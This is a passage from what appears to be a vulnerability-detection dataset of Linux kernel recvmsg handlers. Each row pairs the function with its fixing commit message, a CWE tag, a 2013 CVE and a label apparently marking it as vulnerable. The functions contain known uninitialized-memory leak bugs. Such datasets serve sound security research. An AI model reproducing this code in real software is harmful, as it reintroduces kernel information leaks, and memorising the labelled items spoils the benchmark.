rdma_destroy_id(cm_id);
return ret;
}
| 264,896,393,456,312,270,000,000,000,000,000,000,000 | ib.c | 188,272,071,066,765,100,000,000,000,000,000,000,000 | [
"CWE-399"
] | CVE-2013-7339 | The rds_ib_laddr_check function in net/rds/ib.c in the Linux kernel before 3.12.8 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a bind system call for an RDS socket on a system that lacks RDS transports. | https://nvd.nist.gov/vuln/detail/CVE-2013-7339 |
1,348 | linux | bceaa90240b6019ed73b49965eac7d167610be69 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/bceaa90240b6019ed73b49965eac7d167610be69 | inet: prevent leakage of uninitialized memory to user in recv syscalls
Only update *addr_len when we actually fill in sockaddr, otherwise we
can return uninitialized memory from the stack to the caller in the
recvfrom, recvmmsg and recvmsg syscalls. Drop the the (addr_len == NULL)
checks because we only get called with a valid addr_len pointer either
from sock_common_recvmsg or inet_recvmsg.
If a blocking read waits on a socket which is concurrently shut down we
now return zero and set msg_msgnamelen to 0.
Reported-by: mpb <mpb.mail@gmail.com>
Suggested-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static int dgram_recvmsg(struct kiocb *iocb, struct sock *sk,
struct msghdr *msg, size_t len, int noblock, int flags,
int *addr_len)
{
size_t copied = 0;
int err = -EOPNOTSUPP;
struct sk_buff *skb;
struct sockaddr_ieee802154 *saddr;
saddr = (struct sockaddr_ieee802154 *)msg->msg_name;
skb = skb_recv_datagram(sk, flags, noblock, &err);
if (!skb)
goto out;
copied = skb->len;
if (len < copied) {
msg->msg_flags |= MSG_TRUNC;
copied = len;
}
/* FIXME: skip headers if necessary ?! */
err = skb_copy_datagram_iovec(skb, 0, msg->msg_iov, copied);
if (err)
goto done;
sock_recv_ts_and_drops(msg, sk, skb);
if (saddr) {
saddr->family = AF_IEEE802154;
saddr->addr = mac_cb(skb)->sa;
}
if (addr_len)
*addr_len = sizeof(*saddr);
if (flags & MSG_TRUNC)
copied = skb->len;
done:
skb_free_datagram(sk, skb);
out:
if (err)
return err;
return copied;
}
| 189,468,429,727,011,170,000,000,000,000,000,000,000 | dgram.c | 336,326,295,596,065,970,000,000,000,000,000,000,000 | [
"CWE-200"
] | CVE-2013-7265 | The pn_recvmsg function in net/phonet/datagram.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel stack memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call. | https://nvd.nist.gov/vuln/detail/CVE-2013-7265 |
1,349 | linux | bceaa90240b6019ed73b49965eac7d167610be69 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/bceaa90240b6019ed73b49965eac7d167610be69 | inet: prevent leakage of uninitialized memory to user in recv syscalls
Only update *addr_len when we actually fill in sockaddr, otherwise we
can return uninitialized memory from the stack to the caller in the
recvfrom, recvmmsg and recvmsg syscalls. Drop the the (addr_len == NULL)
checks because we only get called with a valid addr_len pointer either
from sock_common_recvmsg or inet_recvmsg.
If a blocking read waits on a socket which is concurrently shut down we
now return zero and set msg_msgnamelen to 0.
Reported-by: mpb <mpb.mail@gmail.com>
Suggested-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | int ping_recvmsg(struct kiocb *iocb, struct sock *sk, struct msghdr *msg,
size_t len, int noblock, int flags, int *addr_len)
{
struct inet_sock *isk = inet_sk(sk);
int family = sk->sk_family;
struct sockaddr_in *sin;
struct sockaddr_in6 *sin6;
struct sk_buff *skb;
int copied, err;
pr_debug("ping_recvmsg(sk=%p,sk->num=%u)\n", isk, isk->inet_num);
err = -EOPNOTSUPP;
if (flags & MSG_OOB)
goto out;
if (addr_len) {
if (family == AF_INET)
*addr_len = sizeof(*sin);
else if (family == AF_INET6 && addr_len)
*addr_len = sizeof(*sin6);
}
if (flags & MSG_ERRQUEUE) {
if (family == AF_INET) {
return ip_recv_error(sk, msg, len);
#if IS_ENABLED(CONFIG_IPV6)
} else if (family == AF_INET6) {
return pingv6_ops.ipv6_recv_error(sk, msg, len);
#endif
}
}
skb = skb_recv_datagram(sk, flags, noblock, &err);
if (!skb)
goto out;
copied = skb->len;
if (copied > len) {
msg->msg_flags |= MSG_TRUNC;
copied = len;
}
/* Don't bother checking the checksum */
err = skb_copy_datagram_iovec(skb, 0, msg->msg_iov, copied);
if (err)
goto done;
sock_recv_timestamp(msg, sk, skb);
/* Copy the address and add cmsg data. */
if (family == AF_INET) {
sin = (struct sockaddr_in *) msg->msg_name;
sin->sin_family = AF_INET;
sin->sin_port = 0 /* skb->h.uh->source */;
sin->sin_addr.s_addr = ip_hdr(skb)->saddr;
memset(sin->sin_zero, 0, sizeof(sin->sin_zero));
if (isk->cmsg_flags)
ip_cmsg_recv(msg, skb);
#if IS_ENABLED(CONFIG_IPV6)
} else if (family == AF_INET6) {
struct ipv6_pinfo *np = inet6_sk(sk);
struct ipv6hdr *ip6 = ipv6_hdr(skb);
sin6 = (struct sockaddr_in6 *) msg->msg_name;
sin6->sin6_family = AF_INET6;
sin6->sin6_port = 0;
sin6->sin6_addr = ip6->saddr;
sin6->sin6_flowinfo = 0;
if (np->sndflow)
sin6->sin6_flowinfo = ip6_flowinfo(ip6);
sin6->sin6_scope_id = ipv6_iface_scope_id(&sin6->sin6_addr,
IP6CB(skb)->iif);
if (inet6_sk(sk)->rxopt.all)
pingv6_ops.ip6_datagram_recv_ctl(sk, msg, skb);
#endif
} else {
BUG();
}
err = copied;
done:
skb_free_datagram(sk, skb);
out:
pr_debug("ping_recvmsg -> %d\n", err);
return err;
}
| 121,858,951,950,899,140,000,000,000,000,000,000,000 | ping.c | 314,193,521,440,058,100,000,000,000,000,000,000,000 | [
"CWE-200"
] | CVE-2013-7265 | The pn_recvmsg function in net/phonet/datagram.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel stack memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call. | https://nvd.nist.gov/vuln/detail/CVE-2013-7265 |
1,354 | linux | bceaa90240b6019ed73b49965eac7d167610be69 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/bceaa90240b6019ed73b49965eac7d167610be69 | inet: prevent leakage of uninitialized memory to user in recv syscalls
Only update *addr_len when we actually fill in sockaddr, otherwise we
can return uninitialized memory from the stack to the caller in the
recvfrom, recvmmsg and recvmsg syscalls. Drop the the (addr_len == NULL)
checks because we only get called with a valid addr_len pointer either
from sock_common_recvmsg or inet_recvmsg.
If a blocking read waits on a socket which is concurrently shut down we
now return zero and set msg_msgnamelen to 0.
Reported-by: mpb <mpb.mail@gmail.com>
Suggested-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static int l2tp_ip_recvmsg(struct kiocb *iocb, struct sock *sk, struct msghdr *msg,
size_t len, int noblock, int flags, int *addr_len)
{
struct inet_sock *inet = inet_sk(sk);
size_t copied = 0;
int err = -EOPNOTSUPP;
struct sockaddr_in *sin = (struct sockaddr_in *)msg->msg_name;
struct sk_buff *skb;
if (flags & MSG_OOB)
goto out;
if (addr_len)
*addr_len = sizeof(*sin);
skb = skb_recv_datagram(sk, flags, noblock, &err);
if (!skb)
goto out;
copied = skb->len;
if (len < copied) {
msg->msg_flags |= MSG_TRUNC;
copied = len;
}
err = skb_copy_datagram_iovec(skb, 0, msg->msg_iov, copied);
if (err)
goto done;
sock_recv_timestamp(msg, sk, skb);
/* Copy the address. */
if (sin) {
sin->sin_family = AF_INET;
sin->sin_addr.s_addr = ip_hdr(skb)->saddr;
sin->sin_port = 0;
memset(&sin->sin_zero, 0, sizeof(sin->sin_zero));
}
if (inet->cmsg_flags)
ip_cmsg_recv(msg, skb);
if (flags & MSG_TRUNC)
copied = skb->len;
done:
skb_free_datagram(sk, skb);
out:
return err ? err : copied;
}
| 263,984,241,115,726,000,000,000,000,000,000,000,000 | l2tp_ip.c | 55,758,294,290,170,330,000,000,000,000,000,000,000 | [
"CWE-200"
] | CVE-2013-7265 | The pn_recvmsg function in net/phonet/datagram.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel stack memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call. | https://nvd.nist.gov/vuln/detail/CVE-2013-7265 |
1,355 | linux | bceaa90240b6019ed73b49965eac7d167610be69 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/bceaa90240b6019ed73b49965eac7d167610be69 | inet: prevent leakage of uninitialized memory to user in recv syscalls
Only update *addr_len when we actually fill in sockaddr, otherwise we
can return uninitialized memory from the stack to the caller in the
recvfrom, recvmmsg and recvmsg syscalls. Drop the the (addr_len == NULL)
checks because we only get called with a valid addr_len pointer either
from sock_common_recvmsg or inet_recvmsg.
If a blocking read waits on a socket which is concurrently shut down we
now return zero and set msg_msgnamelen to 0.
Reported-by: mpb <mpb.mail@gmail.com>
Suggested-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static int pn_recvmsg(struct kiocb *iocb, struct sock *sk,
struct msghdr *msg, size_t len, int noblock,
int flags, int *addr_len)
{
struct sk_buff *skb = NULL;
struct sockaddr_pn sa;
int rval = -EOPNOTSUPP;
int copylen;
if (flags & ~(MSG_PEEK|MSG_TRUNC|MSG_DONTWAIT|MSG_NOSIGNAL|
MSG_CMSG_COMPAT))
goto out_nofree;
if (addr_len)
*addr_len = sizeof(sa);
skb = skb_recv_datagram(sk, flags, noblock, &rval);
if (skb == NULL)
goto out_nofree;
pn_skb_get_src_sockaddr(skb, &sa);
copylen = skb->len;
if (len < copylen) {
msg->msg_flags |= MSG_TRUNC;
copylen = len;
}
rval = skb_copy_datagram_iovec(skb, 0, msg->msg_iov, copylen);
if (rval) {
rval = -EFAULT;
goto out;
}
rval = (flags & MSG_TRUNC) ? skb->len : copylen;
if (msg->msg_name != NULL)
memcpy(msg->msg_name, &sa, sizeof(struct sockaddr_pn));
out:
skb_free_datagram(sk, skb);
out_nofree:
return rval;
}
| 225,152,650,498,232,850,000,000,000,000,000,000,000 | datagram.c | 134,059,696,568,289,560,000,000,000,000,000,000,000 | [
"CWE-200"
] | CVE-2013-7265 | The pn_recvmsg function in net/phonet/datagram.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel stack memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call. | https://nvd.nist.gov/vuln/detail/CVE-2013-7265 |
1,357 | linux | f3d3342602f8bcbf37d7c46641cb9bca7618eb1c | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/f3d3342602f8bcbf37d7c46641cb9bca7618eb1c | net: rework recvmsg handler msg_name and msg_namelen logic
This patch now always passes msg->msg_namelen as 0. recvmsg handlers must
set msg_namelen to the proper size <= sizeof(struct sockaddr_storage)
to return msg_name to the user.
This prevents numerous uninitialized memory leaks we had in the
recvmsg handlers and makes it harder for new code to accidentally leak
uninitialized memory.
Optimize for the case recvfrom is called with NULL as address. We don't
need to copy the address at all, so set it to NULL before invoking the
recvmsg handler. We can do so, because all the recvmsg handlers must
cope with the case a plain read() is called on them. read() also sets
msg_name to NULL.
Also document these changes in include/linux/net.h as suggested by David
Miller.
Changes since RFC:
Set msg->msg_name = NULL if user specified a NULL in msg_name but had a
non-null msg_namelen in verify_iovec/verify_compat_iovec. This doesn't
affect sendto as it would bail out earlier while trying to copy-in the
address. It also more naturally reflects the logic by the callers of
verify_iovec.
With this change in place I could remove "
if (!uaddr || msg_sys->msg_namelen == 0)
msg->msg_name = NULL
".
This change does not alter the user visible error logic as we ignore
msg_namelen as long as msg_name is NULL.
Also remove two unnecessary curly brackets in ___sys_recvmsg and change
comments to netdev style.
Cc: David Miller <davem@davemloft.net>
Suggested-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | mISDN_sock_recvmsg(struct kiocb *iocb, struct socket *sock,
struct msghdr *msg, size_t len, int flags)
{
struct sk_buff *skb;
struct sock *sk = sock->sk;
struct sockaddr_mISDN *maddr;
int copied, err;
if (*debug & DEBUG_SOCKET)
printk(KERN_DEBUG "%s: len %d, flags %x ch.nr %d, proto %x\n",
__func__, (int)len, flags, _pms(sk)->ch.nr,
sk->sk_protocol);
if (flags & (MSG_OOB))
return -EOPNOTSUPP;
if (sk->sk_state == MISDN_CLOSED)
return 0;
skb = skb_recv_datagram(sk, flags, flags & MSG_DONTWAIT, &err);
if (!skb)
return err;
if (msg->msg_namelen >= sizeof(struct sockaddr_mISDN)) {
msg->msg_namelen = sizeof(struct sockaddr_mISDN);
maddr = (struct sockaddr_mISDN *)msg->msg_name;
maddr->family = AF_ISDN;
maddr->dev = _pms(sk)->dev->id;
if ((sk->sk_protocol == ISDN_P_LAPD_TE) ||
(sk->sk_protocol == ISDN_P_LAPD_NT)) {
maddr->channel = (mISDN_HEAD_ID(skb) >> 16) & 0xff;
maddr->tei = (mISDN_HEAD_ID(skb) >> 8) & 0xff;
maddr->sapi = mISDN_HEAD_ID(skb) & 0xff;
} else {
maddr->channel = _pms(sk)->ch.nr;
maddr->sapi = _pms(sk)->ch.addr & 0xFF;
maddr->tei = (_pms(sk)->ch.addr >> 8) & 0xFF;
}
} else {
if (msg->msg_namelen)
printk(KERN_WARNING "%s: too small namelen %d\n",
__func__, msg->msg_namelen);
msg->msg_namelen = 0;
}
copied = skb->len + MISDN_HEADER_LEN;
if (len < copied) {
if (flags & MSG_PEEK)
atomic_dec(&skb->users);
else
skb_queue_head(&sk->sk_receive_queue, skb);
return -ENOSPC;
}
memcpy(skb_push(skb, MISDN_HEADER_LEN), mISDN_HEAD_P(skb),
MISDN_HEADER_LEN);
err = skb_copy_datagram_iovec(skb, 0, msg->msg_iov, copied);
mISDN_sock_cmsg(sk, msg, skb);
skb_free_datagram(sk, skb);
return err ? : copied;
}
| 25,902,652,839,543,214,000,000,000,000,000,000,000 | socket.c | 259,087,261,855,917,000,000,000,000,000,000,000,000 | [
"CWE-20"
] | CVE-2013-7270 | The packet_recvmsg function in net/packet/af_packet.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call. | https://nvd.nist.gov/vuln/detail/CVE-2013-7270 |
1,359 | linux | f3d3342602f8bcbf37d7c46641cb9bca7618eb1c | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/f3d3342602f8bcbf37d7c46641cb9bca7618eb1c | net: rework recvmsg handler msg_name and msg_namelen logic
This patch now always passes msg->msg_namelen as 0. recvmsg handlers must
set msg_namelen to the proper size <= sizeof(struct sockaddr_storage)
to return msg_name to the user.
This prevents numerous uninitialized memory leaks we had in the
recvmsg handlers and makes it harder for new code to accidentally leak
uninitialized memory.
Optimize for the case recvfrom is called with NULL as address. We don't
need to copy the address at all, so set it to NULL before invoking the
recvmsg handler. We can do so, because all the recvmsg handlers must
cope with the case a plain read() is called on them. read() also sets
msg_name to NULL.
Also document these changes in include/linux/net.h as suggested by David
Miller.
Changes since RFC:
Set msg->msg_name = NULL if user specified a NULL in msg_name but had a
non-null msg_namelen in verify_iovec/verify_compat_iovec. This doesn't
affect sendto as it would bail out earlier while trying to copy-in the
address. It also more naturally reflects the logic by the callers of
verify_iovec.
With this change in place I could remove "
if (!uaddr || msg_sys->msg_namelen == 0)
msg->msg_name = NULL
".
This change does not alter the user visible error logic as we ignore
msg_namelen as long as msg_name is NULL.
Also remove two unnecessary curly brackets in ___sys_recvmsg and change
comments to netdev style.
Cc: David Miller <davem@davemloft.net>
Suggested-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static int atalk_recvmsg(struct kiocb *iocb, struct socket *sock, struct msghdr *msg,
size_t size, int flags)
{
struct sock *sk = sock->sk;
struct sockaddr_at *sat = (struct sockaddr_at *)msg->msg_name;
struct ddpehdr *ddp;
int copied = 0;
int offset = 0;
int err = 0;
struct sk_buff *skb;
skb = skb_recv_datagram(sk, flags & ~MSG_DONTWAIT,
flags & MSG_DONTWAIT, &err);
lock_sock(sk);
if (!skb)
goto out;
/* FIXME: use skb->cb to be able to use shared skbs */
ddp = ddp_hdr(skb);
copied = ntohs(ddp->deh_len_hops) & 1023;
if (sk->sk_type != SOCK_RAW) {
offset = sizeof(*ddp);
copied -= offset;
}
if (copied > size) {
copied = size;
msg->msg_flags |= MSG_TRUNC;
}
err = skb_copy_datagram_iovec(skb, offset, msg->msg_iov, copied);
if (!err) {
if (sat) {
sat->sat_family = AF_APPLETALK;
sat->sat_port = ddp->deh_sport;
sat->sat_addr.s_node = ddp->deh_snode;
sat->sat_addr.s_net = ddp->deh_snet;
}
msg->msg_namelen = sizeof(*sat);
}
skb_free_datagram(sk, skb); /* Free the datagram. */
out:
release_sock(sk);
return err ? : copied;
}
| 30,146,679,912,109,750,000,000,000,000,000,000,000 | ddp.c | 206,398,089,062,534,550,000,000,000,000,000,000,000 | [
"CWE-20"
] | CVE-2013-7270 | The packet_recvmsg function in net/packet/af_packet.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call. | https://nvd.nist.gov/vuln/detail/CVE-2013-7270 |
1,370 | linux | f3d3342602f8bcbf37d7c46641cb9bca7618eb1c | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/f3d3342602f8bcbf37d7c46641cb9bca7618eb1c | net: rework recvmsg handler msg_name and msg_namelen logic
This patch now always passes msg->msg_namelen as 0. recvmsg handlers must
set msg_namelen to the proper size <= sizeof(struct sockaddr_storage)
to return msg_name to the user.
This prevents numerous uninitialized memory leaks we had in the
recvmsg handlers and makes it harder for new code to accidentally leak
uninitialized memory.
Optimize for the case recvfrom is called with NULL as address. We don't
need to copy the address at all, so set it to NULL before invoking the
recvmsg handler. We can do so, because all the recvmsg handlers must
cope with the case a plain read() is called on them. read() also sets
msg_name to NULL.
Also document these changes in include/linux/net.h as suggested by David
Miller.
Changes since RFC:
Set msg->msg_name = NULL if user specified a NULL in msg_name but had a
non-null msg_namelen in verify_iovec/verify_compat_iovec. This doesn't
affect sendto as it would bail out earlier while trying to copy-in the
address. It also more naturally reflects the logic by the callers of
verify_iovec.
With this change in place I could remove "
if (!uaddr || msg_sys->msg_namelen == 0)
msg->msg_name = NULL
".
This change does not alter the user visible error logic as we ignore
msg_namelen as long as msg_name is NULL.
Also remove two unnecessary curly brackets in ___sys_recvmsg and change
comments to netdev style.
Cc: David Miller <davem@davemloft.net>
Suggested-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static int ipx_recvmsg(struct kiocb *iocb, struct socket *sock,
struct msghdr *msg, size_t size, int flags)
{
struct sock *sk = sock->sk;
struct ipx_sock *ipxs = ipx_sk(sk);
struct sockaddr_ipx *sipx = (struct sockaddr_ipx *)msg->msg_name;
struct ipxhdr *ipx = NULL;
struct sk_buff *skb;
int copied, rc;
lock_sock(sk);
/* put the autobinding in */
if (!ipxs->port) {
struct sockaddr_ipx uaddr;
uaddr.sipx_port = 0;
uaddr.sipx_network = 0;
#ifdef CONFIG_IPX_INTERN
rc = -ENETDOWN;
if (!ipxs->intrfc)
goto out; /* Someone zonked the iface */
memcpy(uaddr.sipx_node, ipxs->intrfc->if_node, IPX_NODE_LEN);
#endif /* CONFIG_IPX_INTERN */
rc = __ipx_bind(sock, (struct sockaddr *)&uaddr,
sizeof(struct sockaddr_ipx));
if (rc)
goto out;
}
rc = -ENOTCONN;
if (sock_flag(sk, SOCK_ZAPPED))
goto out;
skb = skb_recv_datagram(sk, flags & ~MSG_DONTWAIT,
flags & MSG_DONTWAIT, &rc);
if (!skb)
goto out;
ipx = ipx_hdr(skb);
copied = ntohs(ipx->ipx_pktsize) - sizeof(struct ipxhdr);
if (copied > size) {
copied = size;
msg->msg_flags |= MSG_TRUNC;
}
rc = skb_copy_datagram_iovec(skb, sizeof(struct ipxhdr), msg->msg_iov,
copied);
if (rc)
goto out_free;
if (skb->tstamp.tv64)
sk->sk_stamp = skb->tstamp;
msg->msg_namelen = sizeof(*sipx);
if (sipx) {
sipx->sipx_family = AF_IPX;
sipx->sipx_port = ipx->ipx_source.sock;
memcpy(sipx->sipx_node, ipx->ipx_source.node, IPX_NODE_LEN);
sipx->sipx_network = IPX_SKB_CB(skb)->ipx_source_net;
sipx->sipx_type = ipx->ipx_type;
sipx->sipx_zero = 0;
}
rc = copied;
out_free:
skb_free_datagram(sk, skb);
out:
release_sock(sk);
return rc;
}
| 112,645,242,093,379,780,000,000,000,000,000,000,000 | af_ipx.c | 127,064,475,985,704,280,000,000,000,000,000,000,000 | [
"CWE-20"
] | CVE-2013-7270 | The packet_recvmsg function in net/packet/af_packet.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call. | https://nvd.nist.gov/vuln/detail/CVE-2013-7270 |
1,378 | linux | f3d3342602f8bcbf37d7c46641cb9bca7618eb1c | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/f3d3342602f8bcbf37d7c46641cb9bca7618eb1c | net: rework recvmsg handler msg_name and msg_namelen logic
This patch now always passes msg->msg_namelen as 0. recvmsg handlers must
set msg_namelen to the proper size <= sizeof(struct sockaddr_storage)
to return msg_name to the user.
This prevents numerous uninitialized memory leaks we had in the
recvmsg handlers and makes it harder for new code to accidentally leak
uninitialized memory.
Optimize for the case recvfrom is called with NULL as address. We don't
need to copy the address at all, so set it to NULL before invoking the
recvmsg handler. We can do so, because all the recvmsg handlers must
cope with the case a plain read() is called on them. read() also sets
msg_name to NULL.
Also document these changes in include/linux/net.h as suggested by David
Miller.
Changes since RFC:
Set msg->msg_name = NULL if user specified a NULL in msg_name but had a
non-null msg_namelen in verify_iovec/verify_compat_iovec. This doesn't
affect sendto as it would bail out earlier while trying to copy-in the
address. It also more naturally reflects the logic by the callers of
verify_iovec.
With this change in place I could remove "
if (!uaddr || msg_sys->msg_namelen == 0)
msg->msg_name = NULL
".
This change does not alter the user visible error logic as we ignore
msg_namelen as long as msg_name is NULL.
Also remove two unnecessary curly brackets in ___sys_recvmsg and change
comments to netdev style.
Cc: David Miller <davem@davemloft.net>
Suggested-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static int nr_recvmsg(struct kiocb *iocb, struct socket *sock,
struct msghdr *msg, size_t size, int flags)
{
struct sock *sk = sock->sk;
struct sockaddr_ax25 *sax = (struct sockaddr_ax25 *)msg->msg_name;
size_t copied;
struct sk_buff *skb;
int er;
/*
* This works for seqpacket too. The receiver has ordered the queue for
* us! We do one quick check first though
*/
lock_sock(sk);
if (sk->sk_state != TCP_ESTABLISHED) {
release_sock(sk);
return -ENOTCONN;
}
/* Now we can treat all alike */
if ((skb = skb_recv_datagram(sk, flags & ~MSG_DONTWAIT, flags & MSG_DONTWAIT, &er)) == NULL) {
release_sock(sk);
return er;
}
skb_reset_transport_header(skb);
copied = skb->len;
if (copied > size) {
copied = size;
msg->msg_flags |= MSG_TRUNC;
}
er = skb_copy_datagram_iovec(skb, 0, msg->msg_iov, copied);
if (er < 0) {
skb_free_datagram(sk, skb);
release_sock(sk);
return er;
}
if (sax != NULL) {
memset(sax, 0, sizeof(*sax));
sax->sax25_family = AF_NETROM;
skb_copy_from_linear_data_offset(skb, 7, sax->sax25_call.ax25_call,
AX25_ADDR_LEN);
}
msg->msg_namelen = sizeof(*sax);
skb_free_datagram(sk, skb);
release_sock(sk);
return copied;
}
| 122,095,893,171,554,320,000,000,000,000,000,000,000 | af_netrom.c | 227,993,719,544,841,100,000,000,000,000,000,000,000 | [
"CWE-20"
] | CVE-2013-7270 | The packet_recvmsg function in net/packet/af_packet.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call. | https://nvd.nist.gov/vuln/detail/CVE-2013-7270 |
1,381 | linux | f3d3342602f8bcbf37d7c46641cb9bca7618eb1c | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/f3d3342602f8bcbf37d7c46641cb9bca7618eb1c | net: rework recvmsg handler msg_name and msg_namelen logic
This patch now always passes msg->msg_namelen as 0. recvmsg handlers must
set msg_namelen to the proper size <= sizeof(struct sockaddr_storage)
to return msg_name to the user.
This prevents numerous uninitialized memory leaks we had in the
recvmsg handlers and makes it harder for new code to accidentally leak
uninitialized memory.
Optimize for the case recvfrom is called with NULL as address. We don't
need to copy the address at all, so set it to NULL before invoking the
recvmsg handler. We can do so, because all the recvmsg handlers must
cope with the case a plain read() is called on them. read() also sets
msg_name to NULL.
Also document these changes in include/linux/net.h as suggested by David
Miller.
Changes since RFC:
Set msg->msg_name = NULL if user specified a NULL in msg_name but had a
non-null msg_namelen in verify_iovec/verify_compat_iovec. This doesn't
affect sendto as it would bail out earlier while trying to copy-in the
address. It also more naturally reflects the logic by the callers of
verify_iovec.
With this change in place I could remove "
if (!uaddr || msg_sys->msg_namelen == 0)
msg->msg_name = NULL
".
This change does not alter the user visible error logic as we ignore
msg_namelen as long as msg_name is NULL.
Also remove two unnecessary curly brackets in ___sys_recvmsg and change
comments to netdev style.
Cc: David Miller <davem@davemloft.net>
Suggested-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static int packet_recvmsg(struct kiocb *iocb, struct socket *sock,
struct msghdr *msg, size_t len, int flags)
{
struct sock *sk = sock->sk;
struct sk_buff *skb;
int copied, err;
struct sockaddr_ll *sll;
int vnet_hdr_len = 0;
err = -EINVAL;
if (flags & ~(MSG_PEEK|MSG_DONTWAIT|MSG_TRUNC|MSG_CMSG_COMPAT|MSG_ERRQUEUE))
goto out;
#if 0
/* What error should we return now? EUNATTACH? */
if (pkt_sk(sk)->ifindex < 0)
return -ENODEV;
#endif
if (flags & MSG_ERRQUEUE) {
err = sock_recv_errqueue(sk, msg, len,
SOL_PACKET, PACKET_TX_TIMESTAMP);
goto out;
}
/*
* Call the generic datagram receiver. This handles all sorts
* of horrible races and re-entrancy so we can forget about it
* in the protocol layers.
*
* Now it will return ENETDOWN, if device have just gone down,
* but then it will block.
*/
skb = skb_recv_datagram(sk, flags, flags & MSG_DONTWAIT, &err);
/*
* An error occurred so return it. Because skb_recv_datagram()
* handles the blocking we don't see and worry about blocking
* retries.
*/
if (skb == NULL)
goto out;
if (pkt_sk(sk)->has_vnet_hdr) {
struct virtio_net_hdr vnet_hdr = { 0 };
err = -EINVAL;
vnet_hdr_len = sizeof(vnet_hdr);
if (len < vnet_hdr_len)
goto out_free;
len -= vnet_hdr_len;
if (skb_is_gso(skb)) {
struct skb_shared_info *sinfo = skb_shinfo(skb);
/* This is a hint as to how much should be linear. */
vnet_hdr.hdr_len = skb_headlen(skb);
vnet_hdr.gso_size = sinfo->gso_size;
if (sinfo->gso_type & SKB_GSO_TCPV4)
vnet_hdr.gso_type = VIRTIO_NET_HDR_GSO_TCPV4;
else if (sinfo->gso_type & SKB_GSO_TCPV6)
vnet_hdr.gso_type = VIRTIO_NET_HDR_GSO_TCPV6;
else if (sinfo->gso_type & SKB_GSO_UDP)
vnet_hdr.gso_type = VIRTIO_NET_HDR_GSO_UDP;
else if (sinfo->gso_type & SKB_GSO_FCOE)
goto out_free;
else
BUG();
if (sinfo->gso_type & SKB_GSO_TCP_ECN)
vnet_hdr.gso_type |= VIRTIO_NET_HDR_GSO_ECN;
} else
vnet_hdr.gso_type = VIRTIO_NET_HDR_GSO_NONE;
if (skb->ip_summed == CHECKSUM_PARTIAL) {
vnet_hdr.flags = VIRTIO_NET_HDR_F_NEEDS_CSUM;
vnet_hdr.csum_start = skb_checksum_start_offset(skb);
vnet_hdr.csum_offset = skb->csum_offset;
} else if (skb->ip_summed == CHECKSUM_UNNECESSARY) {
vnet_hdr.flags = VIRTIO_NET_HDR_F_DATA_VALID;
} /* else everything is zero */
err = memcpy_toiovec(msg->msg_iov, (void *)&vnet_hdr,
vnet_hdr_len);
if (err < 0)
goto out_free;
}
/*
* If the address length field is there to be filled in, we fill
* it in now.
*/
sll = &PACKET_SKB_CB(skb)->sa.ll;
if (sock->type == SOCK_PACKET)
msg->msg_namelen = sizeof(struct sockaddr_pkt);
else
msg->msg_namelen = sll->sll_halen + offsetof(struct sockaddr_ll, sll_addr);
/*
* You lose any data beyond the buffer you gave. If it worries a
* user program they can ask the device for its MTU anyway.
*/
copied = skb->len;
if (copied > len) {
copied = len;
msg->msg_flags |= MSG_TRUNC;
}
